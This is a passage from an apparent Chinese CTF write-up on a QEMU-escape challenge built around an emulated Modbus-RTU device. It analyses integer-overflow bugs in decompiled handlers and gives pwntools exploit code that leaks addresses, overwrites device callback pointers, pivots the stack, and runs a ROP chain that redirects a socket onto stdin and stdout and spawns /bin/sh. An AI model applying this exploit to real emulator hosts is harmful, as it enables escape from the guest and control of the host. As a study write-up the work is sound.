    <span class="n">g_free</span><span class="p">(</span><span class="n">response</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">else</span>
  <span class="p">{</span>
    <span class="n">modbus_response_error</span><span class="p">(</span><span class="n">struct_a1</span><span class="p">,</span> <span class="n">char2D2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>合法性检测处的整数溢出：可以用于 leak 信息</li>
  <li><code class="language-plaintext highlighter-rouge">malloc</code> 处的整数溢出：可以用于构造堆溢出（程序将会把 <code class="language-plaintext highlighter-rouge">starting_addr</code> 处的数据复制到堆上，如果可以提前控制 <code class="language-plaintext highlighter-rouge">starting_addr</code> 处的数据，就可以控制堆溢出的数据）</li>
</ul>

<p>写功能（<code class="language-plaintext highlighter-rouge">func10</code>）的实现：</p>

<p><img loading="lazy" decoding="async" src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251110164653514.png" alt="image.png" /></p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">func10</span><span class="p">(</span><span class="n">modbus_opaque</span> <span class="o">*</span><span class="n">struct_a1</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="n">ppak</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="n">char2D2</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-2Ch]</span>
  <span class="kt">unsigned</span> <span class="kr">__int16</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+16h] [rbp-2Ah]</span>
  <span class="kt">unsigned</span> <span class="kr">__int16</span> <span class="n">starting_addr</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-28h]</span>
  <span class="kt">unsigned</span> <span class="kr">__int16</span> <span class="n">quantity_of_regs</span><span class="p">;</span> <span class="c1">// [rsp+1Ah] [rbp-26h]</span>
  <span class="n">__int64</span> <span class="n">response</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="c1">// [rsp+30h] [rbp-10h] BYREF</span>

  <span class="n">response</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
  <span class="n">char2D2</span> <span class="o">=</span> <span class="o">*</span><span class="n">ppak</span><span class="p">;</span>
  <span class="n">starting_addr</span> <span class="o">=</span> <span class="n">_byteswap_ushort</span><span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">ppak</span> <span class="o">+</span> <span class="mi">1</span><span class="p">));</span>
  <span class="n">quantity_of_regs</span> <span class="o">=</span> <span class="n">_byteswap_ushort</span><span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">ppak</span> <span class="o">+</span> <span class="mi">2</span><span class="p">));</span>
  <span class="k">if</span> <span class="p">(</span> <span class="n">quantity_of_regs</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int16</span><span class="p">)(</span><span class="n">starting_addr</span> <span class="o">+</span> <span class="n">quantity_of_regs</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mh">0x100u</span> <span class="p">)</span><span class="c1">// 整数溢出</span>
  <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">ppak</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">==</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">quantity_of_regs</span> <span class="p">)</span>
    <span class="p">{</span>
      <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">quantity_of_regs</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
        <span class="o">*</span><span class="p">(</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">struct_a1</span><span class="o">-&gt;</span><span class="n">regs</span><span class="p">[</span><span class="mi">2</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">starting_addr</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">ppak</span><span class="p">[</span><span class="mi">2</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">7</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">|</span> <span class="n">ppak</span><span class="p">[</span><span class="mi">2</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">8</span><span class="p">];</span>
      <span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">char2D2</span><span class="p">;</span>
      <span class="n">BYTE1</span><span class="p">(</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">=</span> <span class="mi">16</span><span class="p">;</span>
      <span class="n">BYTE2</span><span class="p">(</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">=</span> <span class="n">HIBYTE</span><span class="p">(</span><span class="n">starting_addr</span><span class="p">);</span>
      <span class="n">BYTE3</span><span class="p">(</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">=</span> <span class="n">starting_addr</span><span class="p">;</span>
      <span class="n">BYTE4</span><span class="p">(</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">=</span> <span class="n">HIBYTE</span><span class="p">(</span><span class="n">quantity_of_regs</span><span class="p">);</span>
      <span class="n">BYTE5</span><span class="p">(</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">=</span> <span class="n">quantity_of_regs</span><span class="p">;</span>
      <span class="n">HIWORD</span><span class="p">(</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">=</span> <span class="n">calc_crc</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">response</span><span class="p">,</span> <span class="mi">6u</span><span class="p">);</span>
      <span class="n">modbus_writeout</span><span class="p">(</span><span class="n">struct_a1</span><span class="p">,</span> <span class="p">(</span><span class="n">__int64</span><span class="p">)</span><span class="n">response</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">else</span>
    <span class="p">{</span>
      <span class="n">modbus_response_error</span><span class="p">(</span><span class="n">struct_a1</span><span class="p">,</span> <span class="n">char2D2</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="k">else</span>
  <span class="p">{</span>
    <span class="n">modbus_response_error</span><span class="p">(</span><span class="n">struct_a1</span><span class="p">,</span> <span class="n">char2D2</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>合法性检测处的整数溢出：可以把用户提供的数据写入 <code class="language-plaintext highlighter-rouge">starting_addr</code> 处（也是一个堆溢出）</li>
</ul>

<h2 id="漏洞利用">漏洞利用</h2>

<p>简单的思路是使用 func10 中的堆溢出进行攻击，但经过调试可以发现那里没有什么有价值的数据结构。在 qemu escape 类题型中，最有价值的数据结构是设备结构体的 <code class="language-plaintext highlighter-rouge">opaque</code> 结构，因为里面保存了这个设备的一些 callback 指针（类似与 <code class="language-plaintext highlighter-rouge">__free_hook</code>），劫持后触发调用就可以达成控制流劫持。</p>

<p>func03 允许我们 malloc uint8 范围内的各种内存大小。我借助 gdb 提供的 <code class="language-plaintext highlighter-rouge">call</code> 功能，将断点下在调用 <code class="language-plaintext highlighter-rouge">g_malloc</code> 处，手动调用 <code class="language-plaintext highlighter-rouge">call (void*)g_malloc(大小)</code> 来拿到各不同大小的区块地址，然后看看哪个离 <code class="language-plaintext highlighter-rouge">modbus</code> opaque 最近（有两个 block 在 opaque 前，但它和 opaque 中间隔了一个会被解引用的指针，溢出时会把它破坏掉；使用更近的那个 block 时不会有这个问题），发现是 <code class="language-plaintext highlighter-rouge">0xf8</code> 大小的区块。</p>

<p>可以使用 gdb 提供的 <code class="language-plaintext highlighter-rouge">set</code> 功能模拟劫持 opaque 中的函数指针，看看哪个劫持会被调用，后续溢出时就以覆盖那个指针为目标。本题中 <code class="language-plaintext highlighter-rouge">can_read</code> 和 <code class="language-plaintext highlighter-rouge">read</code> 都会被调用，因此劫持任意一个都可以。</p>

<blockquote>
  <p>注意这道题的环境非常受限，因此不涉及到堆风水，也不涉及到复杂的 ptmalloc 分配器利用技巧。</p>
</blockquote>

<p>因此我的整体利用思路是：</p>

<ol>
  <li>利用 func03 中的 addr 溢出，先泄漏一些有用的数据（libc 地址、程序地址、堆地址）</li>
  <li>利用 func10 中的 addr 溢出，在一个较大的 <code class="language-plaintext highlighter-rouge">starting_addr</code> 布置数据；</li>
  <li>利用 func03 中的 malloc 参数溢出，触发堆溢出，使刚才布置的数据覆盖 opaque，劫持其中的函数指针。</li>
</ol>

<h3 id="泄漏地址">泄漏地址</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="nf">s</span><span class="p">(</span><span class="nf">func03</span><span class="p">(</span><span class="mh">0xff9f</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">))</span>

    <span class="n">mes</span> <span class="o">=</span> <span class="nf">r</span><span class="p">()</span>
    <span class="n">data</span> <span class="o">=</span> <span class="nf">resolve_pak</span><span class="p">(</span><span class="n">mes</span><span class="p">)</span>

    <span class="n">libc_base</span> <span class="o">=</span> <span class="nf">unpack</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span><span class="o">-</span><span class="mh">0x203b60</span>
    <span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] libc_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="n">prog_base</span> <span class="o">=</span> <span class="nf">unpack</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mh">0xa8</span><span class="p">:</span><span class="mh">0xa8</span><span class="o">+</span><span class="mi">8</span><span class="p">])</span><span class="o">-</span><span class="mh">0x9ea35e</span>
    <span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] prog_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">prog_base</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="n">heap_base</span> <span class="o">=</span> <span class="nf">unpack</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mh">0x10</span><span class="p">:</span><span class="mh">0x18</span><span class="p">])</span><span class="o">-</span><span class="mh">0xa4270</span>
    <span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] heap_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">heap_base</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<p>使用 <code class="language-plaintext highlighter-rouge">pwndbg</code> 或 <code class="language-plaintext highlighter-rouge">gef</code> 提供的 <code class="language-plaintext highlighter-rouge">tele</code> 功能去 check 栈上的各种指针，找一个各类指针汇集之处来泄漏就行。</p>

<h3 id="劫持控制流">劫持控制流</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="nf">s</span><span class="p">(</span><span class="nf">func10</span><span class="p">(</span><span class="mh">0xfff1</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="n">char_backend</span><span class="p">)</span><span class="o">+</span><span class="nf">flat</span><span class="p">([</span><span class="mi">0</span><span class="p">,</span> <span class="n">hijack_rip</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">hijack_rdi_rax</span><span class="p">])).</span><span class="nf">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span><span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="p">)))</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func03</span><span class="p">(</span><span class="mh">0xfa17</span><span class="p">,</span> <span class="mh">0x5f4</span><span class="p">))</span>
</code></pre></div></div>

<p>这里构造的大小、size 数据都需要手动计算（把约束条件都列出来，然后解不等式方程组），打了很多草稿，不重要就省略了。我首先使用 <code class="language-plaintext highlighter-rouge">func10</code> 将一些数据布置到栈上，包括：</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">char_backend</code> 指针：调试发现不加这个程序会炸</li>
  <li><code class="language-plaintext highlighter-rouge">hijack_rip</code> 指针：覆盖 callback 函数劫持控制流</li>
  <li><code class="language-plaintext highlighter-rouge">hijack_rdi_rax</code> 指针：调试的时候发现调用 callback 的时候 <code class="language-plaintext highlighter-rouge">rdi</code> 和 <code class="language-plaintext highlighter-rouge">rax</code> 会是这里的值</li>
</ul>

<p>然后使用 func03 将布置好的数据溢出到 opaque 处，达成控制流劫持。</p>

<h3 id="get-shell">get shell</h3>

<p>题目环境比较复杂：我们是通过一个 socket 和 qemu binary 进行交互和通信而不是 stdin/stdout。因此如果直接调用 <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code>，shell 子进程会继承原来的 stdin/stdout 作为其输入输出，而不是我们的那个 socket。这种情况需要我们打一个 ROP，控制程序执行 <code class="language-plaintext highlighter-rouge">dup(0, socket_fd); dup(1, socket_fd);</code> 把我们的 <code class="language-plaintext highlighter-rouge">socket_fd</code> 复制成为程序新的 stdin/stdout，然后再 <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code>。</p>

<blockquote>
  <p><code class="language-plaintext highlighter-rouge">socket_fd</code> 是多少可以通过 docker 内调试拿到，这里是 10</p>
</blockquote>

<p>题目使用的 glibc 版本较新，难以在仅能控制 <code class="language-plaintext highlighter-rouge">rip</code> <code class="language-plaintext highlighter-rouge">rdi</code> <code class="language-plaintext highlighter-rouge">rax</code> 的情况下做到 ROP。但没有关系，在 glibc 里猛猛找可以找到这个 gadget：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x000000000016bde0 : push rax ; pop rsp ; lea rsi, [rax + 0x48] ; mov rax, qword ptr [rdi + 8] ; jmp qword ptr [rax + 0x18]
</code></pre></div></div>

<p>借助这个 gadget 可以打一个栈迁移。提前在堆某处布置数据（ROP 链）：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># 0x000000000002882f : ret
</span>    <span class="c1"># 0x00000000000dd237 : pop rax ; ret
</span>    <span class="c1"># 0x000000000010f78b : pop rdi ; ret
</span>    <span class="c1"># 0x0000000000110a7d : pop rsi ; ret
</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="nf">flat</span><span class="p">([</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0xdd237</span><span class="p">,</span>
        <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2d6c50</span> <span class="o">+</span> <span class="mh">0x10</span> <span class="o">-</span> <span class="mh">0x18</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x2882f</span><span class="p">,</span> <span class="c1"># ret
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x10f78b</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="c1"># pop rsi; 10
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x110a7d</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># pop rdi; 0
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">"</span><span class="s">dup2</span><span class="sh">"</span><span class="p">],</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x10f78b</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="c1"># pop rsi; 10
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x110a7d</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="c1"># pop rdi; 1
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">"</span><span class="s">dup2</span><span class="sh">"</span><span class="p">],</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x10f78b</span><span class="p">,</span> <span class="n">prog_base</span> <span class="o">+</span> <span class="mh">0xD8A7D7</span><span class="p">,</span> <span class="c1"># pop rdi; "/bin/sh"
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x2882f</span><span class="p">,</span> <span class="c1"># ret (for rsp align)
</span>        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">"</span><span class="s">system</span><span class="sh">"</span><span class="p">]</span>
    <span class="p">])</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func10</span><span class="p">(</span><span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x6c</span><span class="p">,</span> <span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="o">*</span><span class="mh">0x11</span> <span class="o">+</span> <span class="n">payload</span><span class="p">).</span><span class="nf">ljust</span><span class="p">(</span><span class="mh">0x6c</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="p">)))</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func03</span><span class="p">(</span><span class="mh">0x2</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">))</span>
    
    <span class="n">hijack_rip</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x16bde0</span>
    <span class="n">hijack_rdi_rax</span> <span class="o">=</span> <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2d6c50</span>
</code></pre></div></div>

<p>然后就可以拿到可交互的 shell，拿到 flag。</p>

<h2 id="附调试小技巧">附：调试小技巧</h2>

<p>Dockerfile 加一行：<code class="language-plaintext highlighter-rouge">EXPOSE 9999</code></p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdbserver <span class="nt">--once</span> 0.0.0.0:9999 ./qemu-system-x86_64 <span class="se">\</span>
<span class="nt">-machine</span> none <span class="se">\</span>
<span class="nt">-nographic</span> <span class="se">\</span>
<span class="nt">-nodefaults</span> <span class="se">\</span>
<span class="nt">-chardev</span> socket,id<span class="o">=</span>mbus,host<span class="o">=</span>0.0.0.0,port<span class="o">=</span>1502,server<span class="o">=</span>on,wait<span class="o">=</span>off <span class="se">\</span>
<span class="nt">-device</span> modbus-rtu,chardev<span class="o">=</span>mbus,unit-id<span class="o">=</span>1
</code></pre></div></div>

<p><img loading="lazy" decoding="async" src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251110174129930.png" alt="image.png" /></p>

<h2 id="附完整攻击脚本">附：完整攻击脚本</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright © 2025 y2 &lt;cameudis@gmail.com&gt;
</span>
<span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="n">sys</span>
<span class="n">context</span><span class="p">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">tmux</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">splitw</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">-h</span><span class="sh">'</span><span class="p">]</span>

<span class="c1"># ---------------- Environment Config ---------------- #
</span>
<span class="n">filename</span> <span class="o">=</span> <span class="sh">"</span><span class="s">./qemu-system-x86_64</span><span class="sh">"</span>
<span class="n">libc_name</span> <span class="o">=</span> <span class="sh">"</span><span class="s">./libc.so.6</span><span class="sh">"</span>
<span class="n">ip</span> <span class="o">=</span> <span class="sh">"</span><span class="s">127.0.0.1</span><span class="sh">"</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">1502</span>

<span class="n">elf</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="n">libc_name</span><span class="p">)</span>

<span class="c1"># context.log_level = 'debug'
</span><span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">filename</span>

<span class="c1"># ------------------- Exploitation ------------------- #
</span>
<span class="n">ru</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">r</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span>      <span class="n">io</span><span class="p">.</span><span class="nf">recv</span><span class="p">()</span>
<span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="nf">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sa</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sl</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">s</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

<span class="kn">import</span> <span class="n">socket</span>

<span class="n">HOST</span> <span class="o">=</span> <span class="sh">"</span><span class="s">127.0.0.1</span><span class="sh">"</span>
<span class="n">PORT</span> <span class="o">=</span> <span class="mi">1502</span>

<span class="k">def</span> <span class="nf">calc_crc</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">endian</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">'</span><span class="s">little</span><span class="sh">'</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">int</span><span class="p">:</span>
    <span class="n">crc</span> <span class="o">=</span> <span class="mh">0xFFFF</span>
    <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nf">bytes</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
        <span class="n">crc</span> <span class="o">^=</span> <span class="n">b</span>
        <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span>
            <span class="n">crc</span> <span class="o">=</span> <span class="p">((</span><span class="n">crc</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="o">^</span> <span class="mh">0xA001</span><span class="p">)</span> <span class="nf">if </span><span class="p">(</span><span class="n">crc</span> <span class="o">&amp;</span> <span class="mi">1</span><span class="p">)</span> <span class="nf">else </span><span class="p">(</span><span class="n">crc</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span>
            <span class="n">crc</span> <span class="o">&amp;=</span> <span class="mh">0xFFFF</span>
    <span class="k">return</span> <span class="n">crc</span>

<span class="k">def</span> <span class="nf">crc_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">endian</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">'</span><span class="s">little</span><span class="sh">'</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bytes</span><span class="p">:</span>
    <span class="k">return</span> <span class="nf">calc_crc</span><span class="p">(</span><span class="n">data</span><span class="p">).</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">endian</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">big2int</span><span class="p">(</span><span class="n">n</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">):</span>
    <span class="n">num</span> <span class="o">=</span> <span class="nf">ord</span><span class="p">(</span><span class="n">n</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span><span class="o">*</span><span class="mh">0x100</span> <span class="o">+</span> <span class="nf">ord</span><span class="p">(</span><span class="n">n</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
    <span class="k">return</span> <span class="n">num</span>

<span class="k">def</span> <span class="nf">resolve_pak</span><span class="p">(</span><span class="n">p</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">):</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] pak to slave </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span><span class="si">}</span><span class="s">, func </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">func</span> <span class="o">=</span> <span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">func</span> <span class="o">==</span> <span class="mh">0x03</span><span class="p">:</span>
        <span class="n">big_data</span> <span class="o">=</span> <span class="n">p</span><span class="p">[</span><span class="mi">3</span><span class="p">:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
        <span class="n">data</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nf">len</span><span class="p">(</span><span class="n">big_data</span><span class="p">),</span> <span class="mi">2</span><span class="p">):</span>
            <span class="n">data</span> <span class="o">+=</span> <span class="n">big_data</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">].</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">big_data</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s"> Reading data: </span><span class="si">{</span><span class="n">data</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">data</span>
    <span class="k">if</span> <span class="n">func</span> <span class="o">==</span> <span class="mh">0x10</span><span class="p">:</span>
        <span class="n">startaddr</span> <span class="o">=</span> <span class="nf">big2int</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">2</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
        <span class="n">quantity</span> <span class="o">=</span> <span class="nf">big2int</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">6</span><span class="p">])</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s"> Writing data to startaddr: </span><span class="si">{</span><span class="n">startaddr</span><span class="si">}</span><span class="s">, quantity: </span><span class="si">{</span><span class="n">quantity</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">null</span>
    <span class="k">if</span> <span class="n">func</span> <span class="o">&amp;</span> <span class="mh">0x80</span><span class="p">:</span>
        <span class="n">error1</span> <span class="o">=</span> <span class="n">func</span> <span class="o">^</span> <span class="mh">0x80</span>
        <span class="n">error2</span> <span class="o">=</span> <span class="n">p</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s"> error1: </span><span class="si">{</span><span class="n">error1</span><span class="si">}</span><span class="s">, error2: </span><span class="si">{</span><span class="n">error2</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">null</span>

<span class="k">def</span> <span class="nf">func03</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">quant</span><span class="p">):</span>
